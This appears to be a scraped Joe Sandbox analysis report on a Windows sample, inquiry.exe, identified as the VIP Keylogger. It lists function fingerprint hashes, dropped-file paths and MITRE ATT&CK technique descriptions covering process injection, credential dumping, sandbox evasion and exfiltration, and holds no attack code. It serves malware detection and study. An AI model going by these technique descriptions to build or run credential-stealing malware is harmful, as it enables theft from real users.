Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a98852803c49cdd71b709690b457494a1301eda025d444efa8e4422234e1483
Instruction ID: 6b07a2b5a5f8799c3ee560deecb6c8d3452b5c5c71e2430f61f370681a20c227
Opcode Fuzzy Hash: 0a98852803c49cdd71b709690b457494a1301eda025d444efa8e4422234e1483
Instruction Fuzzy Hash: 53C18F78E05218CFDB54DFA9C984B9DBBB2BF89300F1081AAD409AB365DB355E85CF50

Function 054CFA78 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc64e03b354e79d0cb27d9fd3341b331f01c6eba8f341c96a853abc777e5084d
Instruction ID: 11aed30378150040e0daadbd8f05064142e9091abe295adc8661ea7ef596ca4d
Opcode Fuzzy Hash: cc64e03b354e79d0cb27d9fd3341b331f01c6eba8f341c96a853abc777e5084d
Instruction Fuzzy Hash: 6AC19178E00218CFDB54DFA5C984B9DBBB2BB89300F1081AAD409AB365DB355E85CF50

Function 054CF620 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac31dc6b79312b27172352a6e2192f364b7a005c757b5b6d3c8bd606f7534736
Instruction ID: 1120094e03ab5965efb1865a26b9ca30f92b0ba16301da996018a342804d9809
Opcode Fuzzy Hash: ac31dc6b79312b27172352a6e2192f364b7a005c757b5b6d3c8bd606f7534736
Instruction Fuzzy Hash: CBC19078E01218DFDB54DFA9C984BDDBBB2BB89300F1081AAD409AB365DB355E85CF50

Function 054C2DD0 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 428212463d818887e1e2b52549676e82155ea7e7ff37580a5f92bea7826049fb
Instruction ID: f72776209b268cb996dd129c1a6595d0c6dcb531a12eb14506f72bc94ff2ff6d
Opcode Fuzzy Hash: 428212463d818887e1e2b52549676e82155ea7e7ff37580a5f92bea7826049fb
Instruction Fuzzy Hash: EBA10474E00208CFEB14DFA9C948BDDBBB1FF88314F2082AAD449AB295DB745985CF54

Function 054C2DCA Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e4ca1be0f0a9ac2e085376595f88283d3489bff09dafc61cd744f56b0b2236e
Instruction ID: c2c129d22a2fd4ba015c3ef8ee28d93dfacdbd1c467fbb5aeb4ee17cad790081
Opcode Fuzzy Hash: 5e4ca1be0f0a9ac2e085376595f88283d3489bff09dafc61cd744f56b0b2236e
Instruction Fuzzy Hash: 4CA1F574E00208CFEB14DFA9C948BDDBBB1FF88304F2082A9D409AB295DB759985CF54

Function 054C3116 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 783cf9172e7e97f346c2082856d1e89e1248797e2161bb9cd35e619e018f4e74
Instruction ID: 2dcf3df42866d3f5f1b0da35145554f50c1fcf43f55dc020dae3f67ac3274bd2
Opcode Fuzzy Hash: 783cf9172e7e97f346c2082856d1e89e1248797e2161bb9cd35e619e018f4e74
Instruction Fuzzy Hash: 5F910574D00208CFEB50DFA8C948BDDBBB1FF89310F20869AE449AB291DB759985CF54

Function 0103F33C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57dee235d01f5273e55776fd7d99b60021fe4935d010cafd9216cbd9af534199
Instruction ID: ac148d7a76c6e2393119f1ca88ed25051f0de41127ae63d6a2d2aaef711b9a1b
Opcode Fuzzy Hash: 57dee235d01f5273e55776fd7d99b60021fe4935d010cafd9216cbd9af534199
Instruction Fuzzy Hash: 5E512374D0520ACFDB14EFA8D584BEDBBB9FF89300F24812AD485AB298C7759981CF51

Function 0103F15F Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c3abb71b61898562cd8885d31a39a008cb3b010384f8bcfb3acbc9756f1e5fb
Instruction ID: dfcbd8fd6cc9a01cc653e9eed6ed3fdea86ee3646e85b84b0b648dfab23709d0
Opcode Fuzzy Hash: 7c3abb71b61898562cd8885d31a39a008cb3b010384f8bcfb3acbc9756f1e5fb
Instruction Fuzzy Hash: 4B513474D0120ADFDB04EFA8D5887EEBBFABB88300F24C129D444AB298D7759981CF55

Function 01036920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 0103695E
\;q, xrefs: 01036936
\;q, xrefs: 01036952
\;q, xrefs: 0103692C

Memory Dump Source

Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: cc04ae3fe8766454eddbe29c570217b501fd7ee0fd9acde9401dfe95cffabb1c
Instruction ID: 4d59ad1d0d8229fba7377154e60c6002138f6f08f25c6605ddac360d2ce13d24
Opcode Fuzzy Hash: cc04ae3fe8766454eddbe29c570217b501fd7ee0fd9acde9401dfe95cffabb1c
Instruction Fuzzy Hash: 3401F231700115AFC761CA2DC440AA937EEBFC97A472941ABE986CF371DE32DD428750

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report inquiry.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_inquiry.exe_fcd37193b5ccfd31063cfc5e26036f533c63e7_61dfa667_12bae591-e693-4c4a-bc4a-498c1f3dce62\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER355F.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER37E1.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3820.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqad2h4w.n3o.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p01ppd1y.4mi.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfhh1vkh.5zs.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwgituu0.rez.psm1

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Windows Analysis Report
inquiry.exe

Function 00007FFAACC091B0 Relevance: 7.1, Strings: 5, Instructions: 878
COMMON

Function 00007FFAACC033D0 Relevance: 2.0, Strings: 1, Instructions: 731
COMMON

Function 00007FFAACC031B9 Relevance: 1.6, APIs: 1, Instructions: 124
memoryCOMMON

Function 00007FFAACC0974B Relevance: 1.6, APIs: 1, Instructions: 113
memoryCOMMON

Function 01036FC8 Relevance: 6.7, Strings: 5, Instructions: 469
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre